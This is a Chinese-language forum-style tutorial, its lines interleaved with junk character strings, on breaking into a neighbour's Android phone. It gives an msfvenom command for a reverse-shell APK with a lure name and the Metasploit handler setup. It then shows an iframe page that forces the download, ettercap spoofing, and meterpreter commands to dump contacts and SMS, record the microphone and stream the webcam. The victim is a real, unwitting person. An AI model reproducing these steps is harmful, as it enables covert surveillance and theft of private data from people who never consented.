9 Y1 B3 Z' R; }3 v2 G: `7 m" ]. N 五、msf+ettercap入侵邻居安卓手机
8 V( |" b! h" N7 f! Q# K
# s. u; S1 C0 N4 b" Y) \5 K) {+ b7 ? v
首先启动msf 1 j* |+ ]* Z7 D$ u! \( m
6 i1 v+ I' I- O2 r8 O6 |' D, V, q
" q. a3 {5 a! e 先用kali生成一个安卓木马,如下命令: - s! |3 {, |: [! m# H) o% f- h: X
- e) u0 _6 s0 X, Q4 e* o5 a% @
2 N6 E! @5 J- G+ n, N Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
$ A, E' k6 I, v% a4 n# {, O. D 0 c/ ?% H' y& l6 Z: ~$ l
! C- ?$ d/ i+ I 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 $ i$ j7 @' U" w; K; e; }
$ O0 ?9 z" i6 s! @1 a0 e
; A$ q' ? I* w* W. {! K( Q1 w 然后进入msf
9 W* `% e1 G8 f7 O* I' o3 ^: e
( z2 e! H; i: {1 {! _' A1 V% u& \: x8 Z, m
use exploit/multi/handler
l- f" ^" r! u" a8 A. c B 6 ~8 f0 b0 C# J& h# M: e/ A$ H
. U1 y8 x' s* M( R, m& i set payload android/meterpreter/reverse_tcp
* J" ~9 h6 b) @# J2 J2 H
. D8 L0 s( f. @ ~4 V9 T" T6 s" I J% c0 z2 S8 K
set LHOST 192.168.0.109 //ip为kaili的ip
( O: {/ Q& K# j% O3 M @
6 g6 h% \7 _1 C1 v# f" P. I. |
8 v$ c- W, ? E) H4 a" M set LPORT 44444 //端口一定要与前面生成的木马的端口一致 / _% d, A" j$ T$ ~5 i1 S1 r
4 D5 _1 p; {# ~% ]) a9 l
- O& H2 @4 b2 b- J' U) Y1 ?2 | Exploit . S# e$ ^6 r4 z! ~: {& U% t" a
' O$ Z( t" s5 f; q: w+ E
; D9 X1 u& S# z' p
1 n4 |5 H. h1 C0 q! i* T
' _: g- {- T0 g4 F6 T8 M+ c% W2 i3 G7 w! ^7 p* w3 A' l
下面我们开启ettercap -G 6 v6 O) I! h# b1 _2 u& z/ ]) ^" m3 T
$ y d3 ^* f' N7 H6 ~* o
4 h3 Z- W) [. Y# q5 I$ Z" J) ? 我物理IP为 0 l2 i h8 k3 `# a+ N" X) p
" B! p, b4 U/ @+ K/ ?$ s9 [/ J( z
& K S- Q9 a- h! _9 U$ S& r
4 q5 l! G7 u6 O! H) I8 }+ J
3 n4 S1 R5 a) L$ y) v1 R+ O' U8 k9 t
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 9 X3 C! b; }: o0 W4 c+ o
* V( S- H- c3 c* j9 h
6 t$ Z7 e8 u. J* j* z
下面我们来设置一下 ! Y- |" Y* R% X
9 a! v$ i- k8 E! l% Y% V
6 W" ~* y7 }9 w- T1 ^# g* j- B8 o
. s1 x& \8 V J8 \8 h6 F - M, [7 S8 c P) `% z
; ]! F2 t# T! e* ?/ X6 E
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
9 C I! M) K8 ?/ b" E, j% y+ o
3 C5 F% m" r v& ^2 C$ A
6 e; j2 j/ n. C% q 6 ]7 q' ]+ s7 T {( t4 |
# H2 z t# L" T# a/ d8 v4 \' x
% ~6 @: P) |0 W( n- k
, b5 H# V* ^( ?
" o7 b/ A8 z- x" v3 o" e
/ E. [1 A; K6 c a1 C3 B2 f3 i0 k
0 S! A' \+ C; v # S7 W, k0 Q) j" s4 M; p! a
" L4 i' G5 T) @- W0 O) \5 k* w% \ ' s8 L, v% A" ^/ F3 z' G
. \ R) e& B/ Q) ^6 H2 Q
4 f' j5 _/ r, z, f4 D
6 y$ C. d* }9 d) z% A& z # p. G. {! ~$ \$ I: J3 }
( v8 {* [7 o& H! n8 H+ x, F5 u5 b% y
: E. R/ c- g" y0 ^) n& S, e
d |" ^" {3 @( m5 @
% `6 m$ i# @7 p8 w$ p' m
$ R7 x5 `) M3 w& H( E7 o
& w' ~5 [( S& t) ^3 ~1 n0 R
5 Y F, f, S3 x+ i/ C7 r 1 ~+ I$ f1 e! d
% S- p2 h% `& b. a6 S: U1 T
+ m$ Q$ u+ @5 f8 J
% ]. f+ \* f9 `. h7 s1 w
! }) i( r& [1 x! o, b3 P B, N. ^6 K! c0 b7 R. y
4 {0 r' S+ [5 q' |- ~* I
5 P( k; u" f4 c3 r
. Z6 L2 z0 x% |8 v/ H
( e. n% E, i6 J# e: G8 o( M
7 g9 G% q3 R) e% @+ q$ {+ b. g7 u1 Y7 M A8 g
5 u9 k8 J' X3 u3 n' N
% ?! G6 Y& G+ P* c
: n. V6 i" e( R# `, y5 E! j2 S
6 D0 b C+ d" M6 Y: n/ g
0 n+ j6 y' }2 [) [# N& l) @: j7 o8 e" c4 Z$ X5 X
下面我们开始攻击 $ N* j- [" f% t- H( N% H, G- Y
- M& q. h2 x0 ~+ F2 A
" `5 b9 L* [: F+ e. A; ]- C . `6 ^7 s3 J* y$ k
! c! Z2 C( O2 ?: R" u! e) g+ N
s3 q9 F. G& B/ c; j9 g, h2 p
* r+ F8 b5 c' P) ]! C O: l+ P4 J
j( U1 Q; {# L* T, p2 P1 u' X$ N# w2 a" G
I/ I7 j% [5 X4 H+ J o
+ I' P/ S3 R) O4 j( c4 `$ y8 | ^, G# [! t5 g; O( `' `( \
0 l; I' O0 w+ w( t$ O: u1 I! }
1 K3 I7 |* O# R4 A# x x* ^
3 N1 @! H: ]4 r; `: c/ C' Q
8 `3 F. j8 c7 e' c
& E. \! z% h+ B. [8 R
6 U1 S$ y+ ~& |/ x/ \7 b5 y6 V2 R7 I 大概过了5分钟多,发现反弹成功了 + c9 ^8 `0 m, @1 s" O: r
4 v3 ]/ Y8 l z0 O) V% \ e
. @: f' x( {7 z, }/ o
% E5 k6 ~9 I2 j( u2 f) X: O 4 w4 o$ w* G( K9 b
|# \- Z8 \4 V" n# V5 s! C C8 m% U 5 w' Y8 ^8 i- X- @, O( q0 I
0 H' k! F" F1 r+ Z# Q5 e+ W# H9 k q' y& `4 W
0 C; m1 V1 s: b, i# Z2 D
7 ^/ @+ @* I- \5 e! P' E# B f* d0 }- Y
7 k" |2 g4 i Y* g % C/ J) b& A5 P" i" e
' I, T- t7 I7 K! ?- g$ I 4 l3 X% A$ J' S
% u& J+ Y! n" K& p& l V# b; R+ g* o6 }0 R* k/ T+ g$ G3 l
- \; ~$ m6 L2 A, t; V! R, l7 Z
|" w7 F& e0 U+ T; U# F7 Y* ~6 T$ n( f/ u8 W. W; D
$ Q8 ?' W) X* t2 l% c& _8 {& W
, p: I4 ~$ w" ~+ y2 B" A" `, A. Z9 |4 N! o3 I
执行命令 ( p: B: b3 s" e7 Y
5 P1 l* M/ \2 f: F& o& f
8 H' ?* J( K& k l/ M O : P% u7 h* N0 Y# v! w7 i! v
, }( E, a9 X/ _* I: Q4 r/ ~- M5 W T3 g& [
dump_contacts --》这个是导出电话
" I0 n- v, v7 B @! K& ` 6 x; j' n K u( R$ K$ |" O
: d# G) b7 s5 a& R5 r9 B- d dump_sms --》这个是导出信息
/ r( l) Q8 Q7 f' i& l
$ {* v& h- [- f, A4 x( \, o" ~9 r, i* y% O4 w- F
record_mic Record audio from the default microphone for X seconds
& C% ~& @8 Q8 c( ~# Q
4 G7 F# a5 E9 g$ Q. t2 y% P! Q2 L& m( x. s7 E" ]
webcam_chat Start a video chat ! Q3 n, {) Q8 J( z* y& U
8 i8 |6 J1 ]6 Z: p' H4 N9 A8 s) F" i0 x
webcam_list List webcams
- s; L4 _1 v# R. W0 ^ " h( S3 K' J$ Z' @
8 D% |2 G# q- g d- p+ Q Y; b) q: m
webcam_snap Take a snapshot from the specified webcam
! g M% @ ` o" a6 w
1 b- t6 V& W) H3 O/ p# C% C# C1 @; X+ _; }8 ~9 J# J
webcam_stream  lay a video stream from the specified webcam 1 |, ?* u0 X' t( t3 C' C+ ~" J
& O$ P4 y/ r+ T
) Z0 s( b: D1 R3 m# z
2 e5 x, @/ r8 k7 v
8 G- w' R- j$ ?- V- V$ l8 i% j$ Y- d+ D, @- J0 r4 H% v( i
/ q# N1 }( Z; T: s' r: q2 j$ s / w& a! z8 T( J1 V+ |
1 D+ N) ^* B: U& m6 C, _
我们打开看一下电话薄,
. L( R7 R/ Y7 X5 `# b
_/ B4 V2 C6 j" J8 z# E4 z) N5 `( i2 Z1 d4 b+ T( `
5 H: D" z! |7 o2 m# N% O S5 q ( K: D0 H g {$ N5 t
q5 W5 J# k) x' z& I* y& p# I
) x* n5 j: h* A* Z% r
( K5 |, I' N7 k* G
$ d* I" o9 l8 q. L9 {( s% h( }
l# @# W' I' h& o8 E! V) B; ~ 7 b8 w, Z4 @; ], U5 T/ q$ R `8 G
# K1 G0 L( M1 b% }- K# G1 W $ t6 w! b: @1 g9 R8 J2 v/ Z% M
0 n- ]' b# w! W2 G1 C9 \' c
8 Y5 v/ J- g8 p, a9 ]; t
( v8 }( o8 d) F" b5 U
, \2 t9 }7 h" [+ M
4 ?: m* J3 D* u8 O# h
4 B+ q0 F# ] w K , w- B7 ~. X$ H$ _' S: w1 a
5 u& E( e$ I& A. b3 V6 l' a
我们同时欺骗成DroidJack木马,使用方法如图:
4 j* J; \3 \: M/ Y4 s: f 4 ^& G1 N. f4 a% C" J( W3 q
+ N6 ~/ o. ^/ W: G) X $ A3 w I z, d. \) \
; k& z; k0 v! C. J- B7 g; P! B8 V; ^4 F% P
3 B# I) _* K: V k% q/ P
4 R) [$ |& p5 p$ i' _/ }3 A) r) j4 a& T O5 D1 [
5 G6 b4 r2 [9 T5 ?. [ * H8 d: _+ n o
% W' J6 d8 b& O0 ~ 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
" _# {3 a3 x8 z : _: T5 A4 G0 a* b4 G" y
1 x) A5 y9 z2 D( ] . l! T& c4 z% u( q) j3 l" o: U
2 T# _1 I- V# L0 y2 ?- H* H9 y2 S$ B
) @- b4 J+ M1 } q: P E
( u: d9 v5 T! D" |+ ]1 |
- c3 f; w1 O% f( [# @3 g
# S$ k* u1 \5 I' R7 o - W. s! ^0 u5 K- h7 [/ r# _
$ L i# @* E; w: m+ G8 u
$ O1 O1 D2 v. z; L - \; U& Y, T W" x% O) Y
# q% @& A% L8 D7 a# d K- r7 y( Z4 u( a: V
- V2 D/ [& }0 f8 P: l: ]
|